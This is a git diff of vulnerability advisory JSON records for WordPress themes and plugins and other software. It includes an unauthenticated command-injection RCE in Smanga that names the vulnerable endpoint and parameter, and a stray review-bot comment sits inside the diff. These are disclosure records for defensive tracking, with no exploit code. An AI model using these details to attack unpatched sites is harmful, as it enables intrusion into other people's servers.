diff --git a/advisories/unreviewed/2026/02/GHSA-mrp6-8q86-qp29/GHSA-mrp6-8q86-qp29.json b/advisories/unreviewed/2026/02/GHSA-mrp6-8q86-qp29/GHSA-mrp6-8q86-qp29.json
new file mode 100644
index 0000000000000..648898578c67a
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-mrp6-8q86-qp29/GHSA-mrp6-8q86-qp29.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mrp6-8q86-qp29",
+ "modified": "2026-02-20T18:31:38Z",
+ "published": "2026-02-20T18:31:38Z",
+ "aliases": [
+ "CVE-2026-22361"
+ ],
+ "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes A-Mart a-mart allows PHP Local File Inclusion.This issue affects A-Mart: from n/a through <= 1.0.2.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22361"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/a-mart/vulnerability/wordpress-a-mart-theme-1-0-2-local-file-inclusion-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-98"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:34Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-mvfm-p427-8c26/GHSA-mvfm-p427-8c26.json b/advisories/unreviewed/2026/02/GHSA-mvfm-p427-8c26/GHSA-mvfm-p427-8c26.json
new file mode 100644
index 0000000000000..02faba3cf3c58
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-mvfm-p427-8c26/GHSA-mvfm-p427-8c26.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mvfm-p427-8c26",
+ "modified": "2026-02-20T18:31:38Z",
+ "published": "2026-02-20T18:31:38Z",
+ "aliases": [
+ "CVE-2025-69409"
+ ],
+ "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes PJ | Life & Business Coaching pj allows PHP Local File Inclusion.This issue affects PJ | Life & Business Coaching: from n/a through <= 3.0.0.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69409"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/pj/vulnerability/wordpress-pj-life-business-coaching-theme-3-0-0-local-file-inclusion-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-98"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:28Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-mvmh-gv2w-6hrm/GHSA-mvmh-gv2w-6hrm.json b/advisories/unreviewed/2026/02/GHSA-mvmh-gv2w-6hrm/GHSA-mvmh-gv2w-6hrm.json
new file mode 100644
index 0000000000000..d9dbefe94ac9d
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-mvmh-gv2w-6hrm/GHSA-mvmh-gv2w-6hrm.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mvmh-gv2w-6hrm",
+ "modified": "2026-02-20T18:31:36Z",
+ "published": "2026-02-20T18:31:36Z",
+ "aliases": [
+ "CVE-2025-69323"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VeronaLabs Slimstat Analytics wp-slimstat allows Reflected XSS.This issue affects Slimstat Analytics: from n/a through <= 5.3.2.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69323"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/wp-slimstat/vulnerability/wordpress-slimstat-analytics-plugin-5-3-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:19Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-mvp7-2m2r-2548/GHSA-mvp7-2m2r-2548.json b/advisories/unreviewed/2026/02/GHSA-mvp7-2m2r-2548/GHSA-mvp7-2m2r-2548.json
new file mode 100644
index 0000000000000..e122c38294277
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-mvp7-2m2r-2548/GHSA-mvp7-2m2r-2548.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mvp7-2m2r-2548",
+ "modified": "2026-02-20T18:31:35Z",
+ "published": "2026-02-20T18:31:35Z",
+ "aliases": [
+ "CVE-2025-69296"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GhostPool Aardvark aardvark allows Reflected XSS.This issue affects Aardvark: from n/a through <= 4.6.3.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69296"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/aardvark/vulnerability/wordpress-aardvark-theme-4-6-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:16Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-mwrf-hg69-6h5g/GHSA-mwrf-hg69-6h5g.json b/advisories/unreviewed/2026/02/GHSA-mwrf-hg69-6h5g/GHSA-mwrf-hg69-6h5g.json
new file mode 100644
index 0000000000000..930147cf664f1
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-mwrf-hg69-6h5g/GHSA-mwrf-hg69-6h5g.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mwrf-hg69-6h5g",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-67982"
+ ],
+ "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Urna urna allows PHP Local File Inclusion.This issue affects Urna: from n/a through <= 2.5.12.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67982"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/urna/vulnerability/wordpress-urna-theme-2-5-12-local-file-inclusion-vulnerability-2?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-98"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:04Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-mxq6-8688-3xc6/GHSA-mxq6-8688-3xc6.json b/advisories/unreviewed/2026/02/GHSA-mxq6-8688-3xc6/GHSA-mxq6-8688-3xc6.json
index c3535010509ac..a2974bcc5c76e 100644
--- a/advisories/unreviewed/2026/02/GHSA-mxq6-8688-3xc6/GHSA-mxq6-8688-3xc6.json
+++ b/advisories/unreviewed/2026/02/GHSA-mxq6-8688-3xc6/GHSA-mxq6-8688-3xc6.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-mxq6-8688-3xc6",
- "modified": "2026-02-19T18:31:52Z",
+ "modified": "2026-02-20T18:31:27Z",
 "published": "2026-02-19T18:31:52Z",
 "aliases": [
 "CVE-2026-25388"
 ],
 "details": "Missing Authorization vulnerability in scripteo Ads Pro ap-plugin-scripteo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ads Pro: from n/a through <= 5.0.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-862"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T09:16:20Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-p2m5-3j38-g6mj/GHSA-p2m5-3j38-g6mj.json b/advisories/unreviewed/2026/02/GHSA-p2m5-3j38-g6mj/GHSA-p2m5-3j38-g6mj.json
new file mode 100644
index 0000000000000..bb3a6228621b4
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-p2m5-3j38-g6mj/GHSA-p2m5-3j38-g6mj.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p2m5-3j38-g6mj",
+ "modified": "2026-02-20T18:31:39Z",
+ "published": "2026-02-20T18:31:39Z",
+ "aliases": [
+ "CVE-2026-26095"
+ ],
+ "details": "Incorrect Permission Assignment for Critical Resource in Owl opds 2.2.0.4 allows File Manipulation via a crafted network request.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26095"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2026-26095"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-732"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T17:25:54Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-p2vq-xhgq-wqqr/GHSA-p2vq-xhgq-wqqr.json b/advisories/unreviewed/2026/02/GHSA-p2vq-xhgq-wqqr/GHSA-p2vq-xhgq-wqqr.json
new file mode 100644
index 0000000000000..b07042c21d506
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-p2vq-xhgq-wqqr/GHSA-p2vq-xhgq-wqqr.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p2vq-xhgq-wqqr",
+ "modified": "2026-02-20T18:31:36Z",
+ "published": "2026-02-20T18:31:36Z",
+ "aliases": [
+ "CVE-2025-69370"
+ ],
+ "details": "Deserialization of Untrusted Data vulnerability in ThemeGoods Capella capella allows Object Injection.This issue affects Capella: from n/a through <= 2.5.5.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69370"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/capella/vulnerability/wordpress-capella-theme-2-5-5-php-object-injection-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-502"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:21Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-p3w5-jrj2-m9r6/GHSA-p3w5-jrj2-m9r6.json b/advisories/unreviewed/2026/02/GHSA-p3w5-jrj2-m9r6/GHSA-p3w5-jrj2-m9r6.json
new file mode 100644
index 0000000000000..14805d3626a8d
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-p3w5-jrj2-m9r6/GHSA-p3w5-jrj2-m9r6.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p3w5-jrj2-m9r6",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-68069"
+ ],
+ "details": "Missing Authorization vulnerability in wpWax Directorist directorist allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Directorist: from n/a through <= 8.5.10.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68069"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/directorist/vulnerability/wordpress-directorist-plugin-8-5-6-broken-access-control-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-p52x-wxj2-j8jr/GHSA-p52x-wxj2-j8jr.json b/advisories/unreviewed/2026/02/GHSA-p52x-wxj2-j8jr/GHSA-p52x-wxj2-j8jr.json
new file mode 100644
index 0000000000000..13e6a6e75955e
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-p52x-wxj2-j8jr/GHSA-p52x-wxj2-j8jr.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p52x-wxj2-j8jr",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-68043"
+ ],
+ "details": "Missing Authorization vulnerability in LottieFiles LottieFiles lottiefiles allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects LottieFiles: from n/a through <= 3.0.0.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68043"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/lottiefiles/vulnerability/wordpress-lottiefiles-plugin-3-0-0-broken-access-control-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-p57f-h2f5-67v8/GHSA-p57f-h2f5-67v8.json b/advisories/unreviewed/2026/02/GHSA-p57f-h2f5-67v8/GHSA-p57f-h2f5-67v8.json
new file mode 100644
index 0000000000000..17e678a98a6f5
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-p57f-h2f5-67v8/GHSA-p57f-h2f5-67v8.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p57f-h2f5-67v8",
+ "modified": "2026-02-20T18:31:38Z",
+ "published": "2026-02-20T18:31:38Z",
+ "aliases": [
+ "CVE-2025-69406"
+ ],
+ "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeREX FreightCo freightco allows PHP Local File Inclusion.This issue affects FreightCo: from n/a through <= 1.1.7.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69406"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/freightco/vulnerability/wordpress-freightco-theme-1-1-7-local-file-inclusion-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-98"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:26Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-p69v-gqh4-hg9p/GHSA-p69v-gqh4-hg9p.json b/advisories/unreviewed/2026/02/GHSA-p69v-gqh4-hg9p/GHSA-p69v-gqh4-hg9p.json
new file mode 100644
index 0000000000000..427c5e54b17a7
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-p69v-gqh4-hg9p/GHSA-p69v-gqh4-hg9p.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p69v-gqh4-hg9p",
+ "modified": "2026-02-20T18:31:36Z",
+ "published": "2026-02-20T18:31:36Z",
+ "aliases": [
+ "CVE-2025-69329"
+ ],
+ "details": "Deserialization of Untrusted Data vulnerability in Jthemes Prestige prestige allows Object Injection.This issue affects Prestige: from n/a through < 1.4.1.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69329"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/prestige/vulnerability/wordpress-prestige-theme-1-4-1-php-object-injection-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-502"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:20Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-p95v-rww3-j83p/GHSA-p95v-rww3-j83p.json b/advisories/unreviewed/2026/02/GHSA-p95v-rww3-j83p/GHSA-p95v-rww3-j83p.json
new file mode 100644
index 0000000000000..ac3ac157c81b6
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-p95v-rww3-j83p/GHSA-p95v-rww3-j83p.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p95v-rww3-j83p",
+ "modified": "2026-02-20T18:31:36Z",
+ "published": "2026-02-20T18:31:36Z",
+ "aliases": [
+ "CVE-2025-69299"
+ ],
+ "details": "Server-Side Request Forgery (SSRF) vulnerability in Laborator Oxygen oxygen allows Server Side Request Forgery.This issue affects Oxygen: from n/a through <= 6.0.8.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69299"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/oxygen/vulnerability/wordpress-oxygen-theme-6-0-8-server-side-request-forgery-ssrf-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-918"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:17Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-pf6r-4hv7-pr4f/GHSA-pf6r-4hv7-pr4f.json b/advisories/unreviewed/2026/02/GHSA-pf6r-4hv7-pr4f/GHSA-pf6r-4hv7-pr4f.json
new file mode 100644
index 0000000000000..7c8bdd909df0a
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-pf6r-4hv7-pr4f/GHSA-pf6r-4hv7-pr4f.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pf6r-4hv7-pr4f",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-67991"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in vanquish User Extra Fields wp-user-extra-fields allows Reflected XSS.This issue affects User Extra Fields: from n/a through <= 16.8.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67991"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/wp-user-extra-fields/vulnerability/wordpress-user-extra-fields-plugin-16-8-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:05Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-pfgm-6983-f589/GHSA-pfgm-6983-f589.json b/advisories/unreviewed/2026/02/GHSA-pfgm-6983-f589/GHSA-pfgm-6983-f589.json
new file mode 100644
index 0000000000000..5eedab98e0b85
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-pfgm-6983-f589/GHSA-pfgm-6983-f589.json
@@ -0,0 +1,29 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pfgm-6983-f589",
+ "modified": "2026-02-20T18:31:38Z",
+ "published": "2026-02-20T18:31:38Z",
+ "aliases": [
+ "CVE-2025-70831"
+ ],
+ "details": "A Remote Code Execution (RCE) vulnerability was found in Smanga 3.2.7 in the /php/path/rescan.php interface. The application fails to properly sanitize user-supplied input in the mediaId parameter before using it in a system shell command. This allows an unauthenticated attacker to inject arbitrary operating system commands, leading to complete server compromise.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70831"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/LX-66-LX/cve/issues/5"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:29Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-pg4q-7rh5-52c9/GHSA-pg4q-7rh5-52c9.json b/advisories/unreviewed/2026/02/GHSA-pg4q-7rh5-52c9/GHSA-pg4q-7rh5-52c9.json
new file mode 100644
index 0000000000000..0b31d56c005f6
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-pg4q-7rh5-52c9/GHSA-pg4q-7rh5-52c9.json
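Review bot: The new GHSA-pfgm-6983-f589 record is added with `"cwe_ids": []`, `"severity": null` and an empty top-level `"severity": []`, although its `details` text describes unauthenticated OS command injection through the `mediaId` parameter of `/php/path/rescan.php`. Consumers that triage or filter advisories by CWE or severity will not surface this entry ahead of unscored noise. The description corresponds to CWE-78, so `"cwe_ids": ["CWE-78"]` would fit the text. A CVSS vector should be copied from the upstream record once one is published rather than estimated here, and until then the entry is best read as unscored rather than low risk.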
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pg4q-7rh5-52c9",
+ "modified": "2026-02-20T18:31:40Z",
+ "published": "2026-02-20T18:31:39Z",
+ "aliases": [
+ "CVE-2026-27502"
+ ],
+ "details": "SVXportal version 2.5 and prior contain a reflected cross-site scripting vulnerability in log.php via the search query parameter. The application embeds the unsanitized parameter value directly into an HTML input value attribute, allowing an unauthenticated remote attacker to inject and execute arbitrary JavaScript in a victim's browser if the victim visits a crafted URL. This can be used to steal session data, perform actions as the victim, or modify displayed content.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27502"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/sa2blv/SVXportal/blob/master/log.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/svxportal-log-php-search-reflected-xss"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T17:25:56Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-pj5w-7j3v-9wwv/GHSA-pj5w-7j3v-9wwv.json b/advisories/unreviewed/2026/02/GHSA-pj5w-7j3v-9wwv/GHSA-pj5w-7j3v-9wwv.json
new file mode 100644
index 0000000000000..90471ced8be2b
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-pj5w-7j3v-9wwv/GHSA-pj5w-7j3v-9wwv.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pj5w-7j3v-9wwv",
+ "modified": "2026-02-20T18:31:35Z",
+ "published": "2026-02-20T18:31:35Z",
+ "aliases": [
+ "CVE-2025-68854"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in harman79 ID Arrays id-arrays allows DOM-Based XSS.This issue affects ID Arrays: from n/a through <= 2.1.2.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68854"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/id-arrays/vulnerability/wordpress-id-arrays-plugin-2-1-2-post-based-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:14Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-pjx3-8fqj-x6hr/GHSA-pjx3-8fqj-x6hr.json b/advisories/unreviewed/2026/02/GHSA-pjx3-8fqj-x6hr/GHSA-pjx3-8fqj-x6hr.json
new file mode 100644
index 0000000000000..cb1f59587984f
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-pjx3-8fqj-x6hr/GHSA-pjx3-8fqj-x6hr.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pjx3-8fqj-x6hr",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-67972"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in fox-themes Prague prague-plugins allows Reflected XSS.This issue affects Prague: from n/a through <= 2.2.8.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67972"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/prague-plugins/vulnerability/wordpress-prague-plugin-2-2-8-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:03Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-pm2j-978g-6g85/GHSA-pm2j-978g-6g85.json b/advisories/unreviewed/2026/02/GHSA-pm2j-978g-6g85/GHSA-pm2j-978g-6g85.json
new file mode 100644
index 0000000000000..6c96badd3d93d
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-pm2j-978g-6g85/GHSA-pm2j-978g-6g85.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pm2j-978g-6g85",
+ "modified": "2026-02-20T18:31:39Z",
+ "published": "2026-02-20T18:31:39Z",
+ "aliases": [
+ "CVE-2026-26096"
+ ],
+ "details": "Incorrect Permission Assignment for Critical Resource in Owl opds 2.2.0.4 allows File Manipulation via a crafted network request.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26096"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2026-26096"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-732"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T17:25:54Z"
+ }
+}
\ No newline at end of file
